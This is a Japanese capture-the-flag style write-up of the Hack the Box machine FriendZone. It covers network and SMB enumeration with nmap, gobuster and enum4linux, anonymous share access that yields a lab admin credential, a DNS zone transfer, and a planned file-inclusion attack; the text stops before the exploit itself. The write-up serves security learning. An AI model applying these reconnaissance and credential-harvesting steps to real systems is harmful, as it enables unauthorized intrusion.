This page looks best with JavaScript enabled

【Hack the Box write-up】FriendZone

 ·   ·  ☕ 9 min read  ·  ✍️ さんぽし

はじめに

筆者は Hack the Box 初心者です。
何か訂正や補足、アドバイスなどありましたら、コメントか Twitter までお願いします。
さんぽし(@sanpo_shiho) | Twitter

cheat sheet

以下で cheat sheet としてツールの使い方などをまとめています。参考にしてください。
github | sanposhiho/MY_CHEAT_SHEET

machineについて

難易度は easy です
スクリーンショット 2020-06-22 10.37.52.png

easy の中では難易度は高めの machine です

スクリーンショット 2020-06-22 10.46.16.png

nmap

kali@kali:~$ nmap -sV -sC 10.10.10.123
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-20 00:08 EDT
Nmap scan report for 10.10.10.123
Host is up (0.23s latency).
Not shown: 993 closed ports
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 3.0.3
22/tcp  open  ssh         OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 a9:68:24:bc:97:1f:1e:54:a5:80:45:e7:4c:d9:aa:a0 (RSA)
|   256 e5:44:01:46:ee:7a:bb:7c:e9:1a:cb:14:99:9e:2b:8e (ECDSA)
|_  256 00:4e:1a:4f:33:e8:a0🇩🇪86:a6:e4:2a:5f:84:61:2b (ED25519)
53/tcp  open  domain      ISC BIND 9.11.3-1ubuntu1.2 (Ubuntu Linux)
| dns-nsid: 
|_  bind.version: 9.11.3-1ubuntu1.2-Ubuntu
80/tcp  open  http        Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Friend Zone Escape software
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
443/tcp open  ssl/http    Apache httpd 2.4.29
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: 404 Not Found
| ssl-cert: Subject: commonName=friendzone.red/organizationName=CODERED/stateOrProvinceName=CODERED/countryName=JO
| Not valid before: 2018-10-05T21:02:30
|_Not valid after:  2018-11-04T21:02:30
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
445/tcp open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Service Info: Hosts: FRIENDZONE, 127.0.1.1; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -55m52s, deviation: 1h43m54s, median: 4m06s
|_nbstat: NetBIOS name: FRIENDZONE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: friendzone
|   NetBIOS computer name: FRIENDZONE\x00
|   Domain name: \x00
|   FQDN: friendzone
|_  System time: 2020-06-20T07:13:43+03:00                                                                                                                                                                                                 
| smb-security-mode:                                                                                                                                                                                                                       
|   account_used: guest                                                                                                                                                                                                                    
|   authentication_level: user                                                                                                                                                                                                             
|   challenge_response: supported                                                                                                                                                                                                          
|_  message_signing: disabled (dangerous, but default)                                                                                                                                                                                     
| smb2-security-mode:                                                                                                                                                                                                                      
|   2.02:                                                                                                                                                                                                                                  
|_    Message signing enabled but not required                                                                                                                                                                                             
| smb2-time:                                                                                                                                                                                                                               
|   date: 2020-06-20T04:13:42                                                                                                                                                                                                              
|_  start_date: N/A                                                                                                                                                                                                                        
                                                                                                                                                                                                                                           
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .                                                                                                                                             
Nmap done: 1 IP address (1 host up) scanned in 72.33 seconds 

80番

スクリーンショット 2020-06-20 13.16.53.png

gobuster

kali@kali:~$ gobuster dir -u http://10.10.10.123 -w SecLists/Discovery/Web-Content/big.txt  -k -t 40 -x php,txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.123
[+] Threads:        40
[+] Wordlist:       SecLists/Discovery/Web-Content/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php,txt
[+] Timeout:        10s
===============================================================
2020/06/20 00:18:04 Starting gobuster
===============================================================
/.htpasswd (Status: 403)
/.htpasswd.php (Status: 403)
/.htpasswd.txt (Status: 403)
/.htaccess (Status: 403)
/.htaccess.php (Status: 403)
/.htaccess.txt (Status: 403)
/robots.txt (Status: 200)
/robots.txt (Status: 200)
/server-status (Status: 403)
/wordpress (Status: 301)

kali@kali:~$ gobuster dir -u http://10.10.10.123/wordpress -w SecLists/Discovery/Web-Content/big.txt  -k -t 40 -x php,txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.123/wordpress
[+] Threads:        40
[+] Wordlist:       SecLists/Discovery/Web-Content/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php,txt
[+] Timeout:        10s
===============================================================
2020/06/21 16:39:16 Starting gobuster
===============================================================
/.htaccess (Status: 403)
/.htaccess.php (Status: 403)
/.htaccess.txt (Status: 403)
/.htpasswd (Status: 403)
/.htpasswd.php (Status: 403)
/.htpasswd.txt (Status: 403)
===============================================================
2020/06/21 16:46:07 Finished
===============================================================

443番

スクリーンショット 2020-06-20 13.25.26.png

gobuster

kali@kali:~$ gobuster dir -u https://10.10.10.123 -w SecLists/Discovery/Web-Content/big.txt  -k -t 40 -x php,txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            https://10.10.10.123
[+] Threads:        40
[+] Wordlist:       SecLists/Discovery/Web-Content/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php,txt
[+] Timeout:        10s
===============================================================
2020/06/20 00:24:32 Starting gobuster
===============================================================
/server-status (Status: 403)
===============================================================
2020/06/20 00:31:12 Finished
===============================================================

enum4linux

kali@kali:~$ enum4linux -a 10.10.10.123
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Jun 21 14:27:20 2020

 ========================== 
|    Target Information    |
 ========================== 
Target ........... 10.10.10.123
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ==================================================== 
|    Enumerating Workgroup/Domain on 10.10.10.123    |
 ==================================================== 
[+] Got domain/workgroup name: WORKGROUP

 ============================================ 
|    Nbtstat Information for 10.10.10.123    |
 ============================================ 
Looking up status of 10.10.10.123
        FRIENDZONE      <00> -         B <ACTIVE>  Workstation Service
        FRIENDZONE      <03> -         B <ACTIVE>  Messenger Service
        FRIENDZONE      <20> -         B <ACTIVE>  File Server Service
        ..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>  Master Browser
        WORKGROUP       <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
        WORKGROUP       <1d> -         B <ACTIVE>  Master Browser
        WORKGROUP       <1e> - <GROUP> B <ACTIVE>  Browser Service Elections

        MAC Address = 00-00-00-00-00-00

 ===================================== 
|    Session Check on 10.10.10.123    |
 ===================================== 
[+] Server 10.10.10.123 allows sessions using username '', password ''

 =========================================== 
|    Getting domain SID for 10.10.10.123    |
 =========================================== 
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup

 ====================================== 
|    OS information on 10.10.10.123    |
 ====================================== 
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for 10.10.10.123 from smbclient: 
[+] Got OS info for 10.10.10.123 from srvinfo:
        FRIENDZONE     Wk Sv PrQ Unx NT SNT FriendZone server (Samba, Ubuntu)
        platform_id     :       500
        os version      :       6.1
        server type     :       0x809a03

 ============================= 
|    Users on 10.10.10.123    |
 ============================= 
Use of uninitialized value $users in print at ./enum4linux.pl line 874.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 877.

Use of uninitialized value $users in print at ./enum4linux.pl line 888.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 890.

 ========================================= 
|    Share Enumeration on 10.10.10.123    |
 ========================================= 

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        Files           Disk      FriendZone Samba Server Files /etc/Files
        general         Disk      FriendZone Samba Server Files
        Development     Disk      FriendZone Samba Server Files
        IPC$            IPC       IPC Service (FriendZone server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available

[+] Attempting to map shares on 10.10.10.123
//10.10.10.123/print$   Mapping: DENIED, Listing: N/A
//10.10.10.123/Files    Mapping: DENIED, Listing: N/A
//10.10.10.123/general  Mapping: OK, Listing: OK
//10.10.10.123/Development      Mapping: OK, Listing: OK
//10.10.10.123/IPC$     [E] Can't understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*

 ==================================================== 
|    Password Policy Information for 10.10.10.123    |
 ==================================================== 
[E] Unexpected error from polenum:


[+] Attaching to 10.10.10.123 using a NULL share

[+] Trying protocol 139/SMB...

        [!] Protocol failed: Missing required parameter 'digestmod'.

[+] Trying protocol 445/SMB...

        [!] Protocol failed: Missing required parameter 'digestmod'.


[+] Retieved partial password policy with rpcclient:

Password Complexity: Disabled
Minimum Password Length: 5


 ============================== 
|    Groups on 10.10.10.123    |
 ============================== 

[+] Getting builtin groups:

[+] Getting builtin group memberships:

[+] Getting local groups:

[+] Getting local group memberships:

[+] Getting domain groups:

[+] Getting domain group memberships:

 ======================================================================= 
|    Users on 10.10.10.123 via RID cycling (RIDS: 500-550,1000-1050)    |
 ======================================================================= 
[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-21-3651157261-4258463691-276428382
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
S-1-5-32-500 *unknown*\*unknown* (8)
S-1-5-32-501 *unknown*\*unknown* (8)
S-1-5-32-502 *unknown*\*unknown* (8)
S-1-5-32-503 *unknown*\*unknown* (8)
S-1-5-32-504 *unknown*\*unknown* (8)
S-1-5-32-505 *unknown*\*unknown* (8)
S-1-5-32-506 *unknown*\*unknown* (8)
S-1-5-32-507 *unknown*\*unknown* (8)
S-1-5-32-508 *unknown*\*unknown* (8)
S-1-5-32-509 *unknown*\*unknown* (8)
S-1-5-32-510 *unknown*\*unknown* (8)
S-1-5-32-511 *unknown*\*unknown* (8)
S-1-5-32-512 *unknown*\*unknown* (8)
S-1-5-32-513 *unknown*\*unknown* (8)
S-1-5-32-514 *unknown*\*unknown* (8)
S-1-5-32-515 *unknown*\*unknown* (8)
S-1-5-32-516 *unknown*\*unknown* (8)
S-1-5-32-517 *unknown*\*unknown* (8)
S-1-5-32-518 *unknown*\*unknown* (8)
S-1-5-32-519 *unknown*\*unknown* (8)
S-1-5-32-520 *unknown*\*unknown* (8)
S-1-5-32-521 *unknown*\*unknown* (8)
S-1-5-32-522 *unknown*\*unknown* (8)
S-1-5-32-523 *unknown*\*unknown* (8)
S-1-5-32-524 *unknown*\*unknown* (8)
S-1-5-32-525 *unknown*\*unknown* (8)
S-1-5-32-526 *unknown*\*unknown* (8)
S-1-5-32-527 *unknown*\*unknown* (8)
S-1-5-32-528 *unknown*\*unknown* (8)
S-1-5-32-529 *unknown*\*unknown* (8)
S-1-5-32-530 *unknown*\*unknown* (8)
S-1-5-32-531 *unknown*\*unknown* (8)
S-1-5-32-532 *unknown*\*unknown* (8)
S-1-5-32-533 *unknown*\*unknown* (8)
S-1-5-32-534 *unknown*\*unknown* (8)
S-1-5-32-535 *unknown*\*unknown* (8)
S-1-5-32-536 *unknown*\*unknown* (8)
S-1-5-32-537 *unknown*\*unknown* (8)
S-1-5-32-538 *unknown*\*unknown* (8)
S-1-5-32-539 *unknown*\*unknown* (8)
S-1-5-32-540 *unknown*\*unknown* (8)
S-1-5-32-541 *unknown*\*unknown* (8)
S-1-5-32-542 *unknown*\*unknown* (8)
S-1-5-32-543 *unknown*\*unknown* (8)
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
S-1-5-32-1000 *unknown*\*unknown* (8)
S-1-5-32-1001 *unknown*\*unknown* (8)
S-1-5-32-1002 *unknown*\*unknown* (8)
S-1-5-32-1003 *unknown*\*unknown* (8)
S-1-5-32-1004 *unknown*\*unknown* (8)
S-1-5-32-1005 *unknown*\*unknown* (8)
S-1-5-32-1006 *unknown*\*unknown* (8)
S-1-5-32-1007 *unknown*\*unknown* (8)
S-1-5-32-1008 *unknown*\*unknown* (8)
S-1-5-32-1009 *unknown*\*unknown* (8)
S-1-5-32-1010 *unknown*\*unknown* (8)
S-1-5-32-1011 *unknown*\*unknown* (8)
S-1-5-32-1012 *unknown*\*unknown* (8)
S-1-5-32-1013 *unknown*\*unknown* (8)
S-1-5-32-1014 *unknown*\*unknown* (8)
S-1-5-32-1015 *unknown*\*unknown* (8)
S-1-5-32-1016 *unknown*\*unknown* (8)
S-1-5-32-1017 *unknown*\*unknown* (8)
S-1-5-32-1018 *unknown*\*unknown* (8)
S-1-5-32-1019 *unknown*\*unknown* (8)
S-1-5-32-1020 *unknown*\*unknown* (8)
S-1-5-32-1021 *unknown*\*unknown* (8)
S-1-5-32-1022 *unknown*\*unknown* (8)
S-1-5-32-1023 *unknown*\*unknown* (8)
S-1-5-32-1024 *unknown*\*unknown* (8)
S-1-5-32-1025 *unknown*\*unknown* (8)
S-1-5-32-1026 *unknown*\*unknown* (8)
S-1-5-32-1027 *unknown*\*unknown* (8)
S-1-5-32-1028 *unknown*\*unknown* (8)
S-1-5-32-1029 *unknown*\*unknown* (8)
S-1-5-32-1030 *unknown*\*unknown* (8)
S-1-5-32-1032 *unknown*\*unknown* (8)
S-1-5-32-1033 *unknown*\*unknown* (8)
S-1-5-32-1034 *unknown*\*unknown* (8)
S-1-5-32-1035 *unknown*\*unknown* (8)
S-1-5-32-1036 *unknown*\*unknown* (8)
S-1-5-32-1037 *unknown*\*unknown* (8)
S-1-5-32-1038 *unknown*\*unknown* (8)
S-1-5-32-1039 *unknown*\*unknown* (8)
S-1-5-32-1040 *unknown*\*unknown* (8)
S-1-5-32-1041 *unknown*\*unknown* (8)
S-1-5-32-1042 *unknown*\*unknown* (8)
S-1-5-32-1043 *unknown*\*unknown* (8)
S-1-5-32-1044 *unknown*\*unknown* (8)
S-1-5-32-1045 *unknown*\*unknown* (8)
S-1-5-32-1046 *unknown*\*unknown* (8)
S-1-5-32-1047 *unknown*\*unknown* (8)
S-1-5-32-1048 *unknown*\*unknown* (8)
S-1-5-32-1049 *unknown*\*unknown* (8)
S-1-5-32-1050 *unknown*\*unknown* (8)
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\friend (Local User)
[+] Enumerating users using SID S-1-5-21-3651157261-4258463691-276428382 and logon username '', password ''
S-1-5-21-3651157261-4258463691-276428382-500 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-501 FRIENDZONE\nobody (Local User)
S-1-5-21-3651157261-4258463691-276428382-502 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-503 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-504 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-505 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-506 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-507 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-508 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-509 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-510 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-511 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-512 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-513 FRIENDZONE\None (Domain Group)
S-1-5-21-3651157261-4258463691-276428382-514 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-515 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-516 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-517 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-518 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-519 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-520 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-521 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-522 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-523 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-524 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-525 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-526 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-527 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-528 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-529 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-530 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-531 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-532 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-533 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-534 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-535 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-536 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-537 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-538 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-539 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-540 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-541 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-542 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-543 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-544 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-545 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-546 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-547 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-548 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-549 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-550 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1000 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1001 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1002 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1003 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1004 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1005 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1006 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1007 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1008 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1009 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1010 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1011 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1012 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1013 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1014 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1015 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1016 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1017 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1018 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1019 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1020 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1021 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1022 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1023 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1024 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1025 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1026 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1027 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1028 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1029 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1030 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1031 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1032 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1033 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1034 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1035 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1036 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1037 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1038 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1039 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1040 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1041 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1042 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1043 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1044 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1045 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1046 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1047 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1048 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1049 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1050 *unknown*\*unknown* (8)

 ============================================= 
|    Getting printer info for 10.10.10.123    |
 ============================================= 
No printers returned.


enum4linux complete on Sun Jun 21 14:56:12 2020

nmap-script smb

kali@kali:~$ nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.10.123
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-21 14:35 EDT
Nmap scan report for 10.10.10.123
Host is up (0.26s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-enum-shares: 
|   account_used: guest
|   \\10.10.10.123\Development: 
|     Type: STYPE_DISKTREE
|     Comment: FriendZone Samba Server Files
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\etc\Development
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.10.123\Files: 
|     Type: STYPE_DISKTREE
|     Comment: FriendZone Samba Server Files /etc/Files
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\etc\hole
|     Anonymous access: <none>
|     Current user access: <none>
|   \\10.10.10.123\IPC$: 
|     Type: STYPE_IPC_HIDDEN
|     Comment: IPC Service (FriendZone server (Samba, Ubuntu))
|     Users: 1
|     Max Users: <unlimited>
|     Path: C:\tmp
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE                                                                                                                                                                                                      
|   \\10.10.10.123\general:                                                                                                                                                                                                                
|     Type: STYPE_DISKTREE                                                                                                                                                                                                                 
|     Comment: FriendZone Samba Server Files                                                                                                                                                                                               
|     Users: 0                                                                                                                                                                                                                             
|     Max Users: <unlimited>                                                                                                                                                                                                               
|     Path: C:\etc\general                                                                                                                                                                                                                 
|     Anonymous access: READ/WRITE                                                                                                                                                                                                         
|     Current user access: READ/WRITE                                                                                                                                                                                                      
|   \\10.10.10.123\print$:                                                                                                                                                                                                                 
|     Type: STYPE_DISKTREE                                                                                                                                                                                                                 
|     Comment: Printer Drivers                                                                                                                                                                                                             
|     Users: 0                                                                                                                                                                                                                             
|     Max Users: <unlimited>                                                                                                                                                                                                               
|     Path: C:\var\lib\samba\printers                                                                                                                                                                                                      
|     Anonymous access: <none>                                                                                                                                                                                                             
|_    Current user access: <none>                                                                                                                                                                                                          
|_smb-enum-users: ERROR: Script execution failed (use -d to debug)  

smbclientで色々に繋いでみる

kali@kali:~$ smbclient //10.10.10.123/general
Enter WORKGROUP\kali's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Wed Jan 16 15:10:51 2019
  ..                                  D        0  Wed Jan 23 16:51:02 2019
  creds.txt                           N       57  Tue Oct  9 19:52:42 2018

                9221460 blocks of size 1024. 6460296 blocks available
smb: \> get creds.txt
getting file \creds.txt of size 57 as creds.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \> exit
kali@kali:~$ smbclient //10.10.10.123/Development
Enter WORKGROUP\kali's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sun Jun 21 14:40:00 2020
  ..                                  D        0  Wed Jan 23 16:51:02 2019

                9221460 blocks of size 1024. 6460296 blocks available
smb: \> exit
kali@kali:~$ cat creds.txt 
creds for the admin THING:

admin:WORKWORKHhallelujah@#


なんかの cred が手に入りました

hostname

445 番が not found でなんも情報が出てこないので証明書を見てみると friendzone.red と言う hostname が出てきます

スクリーンショット 2020-06-22 5.52.10.png

/etc/hosts に 10.10.10.123 friendzone.red を追記してアクセスします。

スクリーンショット 2020-06-22 5.53.54.png

改めてgobuster

kali@kali:~$ gobuster dir -u https://friendzone.red -w SecLists/Discovery/Web-Content/big.txt  -k -t 40 -x php,txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            https://friendzone.red
[+] Threads:        40
[+] Wordlist:       SecLists/Discovery/Web-Content/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php,txt
[+] Timeout:        10s
===============================================================
2020/06/21 16:55:39 Starting gobuster
===============================================================
/.htaccess (Status: 403)
/.htaccess.php (Status: 403)
/.htaccess.txt (Status: 403)
/.htpasswd (Status: 403)
/.htpasswd.php (Status: 403)
/.htpasswd.txt (Status: 403)
/admin (Status: 301)
/js (Status: 301)
/server-status (Status: 403)
===============================================================
2020/06/21 17:02:30 Finished
===============================================================

/js/js

スクリーンショット 2020-06-22 6.08.43.png

Testing some functions !
I'am trying not to break things !
TzNlR0g4QzhnSzE1OTI3NzM5NTl4R2tlRjcwdE15

文字列はアクセスのたびに変わっていました。
んー良く分からんので後回しにします

subdomain enumeration

53 番ポートが空いているので subdomain の調査を行います

kali@kali:~$ host -l friendzone.red 10.10.10.123
Using domain server:
Name: 10.10.10.123
Address: 10.10.10.123#53
Aliases: 

friendzone.red has IPv6 address ::1
friendzone.red name server localhost.
friendzone.red has address 127.0.0.1
administrator1.friendzone.red has address 127.0.0.1
hr.friendzone.red has address 127.0.0.1
uploads.friendzone.red has address 127.0.0.1

色々見てみる

出てきたいろんな subdomain も /etc/hosts に書き込みます

(hr.friendzone.red は notfound でした)

uploads.friendzone.red

スクリーンショット 2020-06-22 8.02.12.png

administrator1.friendzone.red

スクリーンショット 2020-06-22 8.02.42.png

先ほどの admin:WORKWORKHhallelujah@# を使うとログインに成功します

gobuster

kali@kali:~$ gobuster dir -u  https://administrator1.friendzone.red/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt  -k -t 40 -x php,txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            https://administrator1.friendzone.red/
[+] Threads:        40
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php,txt
[+] Timeout:        10s
===============================================================
2020/06/21 19:32:45 Starting gobuster
===============================================================
/login.php (Status: 200)
/images (Status: 301)
/dashboard.php (Status: 200)
/timestamp.php (Status: 200)

スクリーンショット 2020-06-22 8.05.45.png

/dashboard.php にアクセスしてみます

スクリーンショット 2020-06-22 8.06.29.png

default の params を入れてみます

スクリーンショット 2020-06-22 8.12.01.png

腹たつ画像が出てきました

timestamp は gobuster で出ていた timestamp.php を指しているような気がするので LFI を使えそう?

LFIのためのupload場所探し

第一候補は uploads.friendzone.red でしたがどこに upload されているのかわかりませんでした。
う〜んと思っていると、わざわざ uploads.friendzone.red を使わなくても smb で転送で良いじゃんと気がつきます

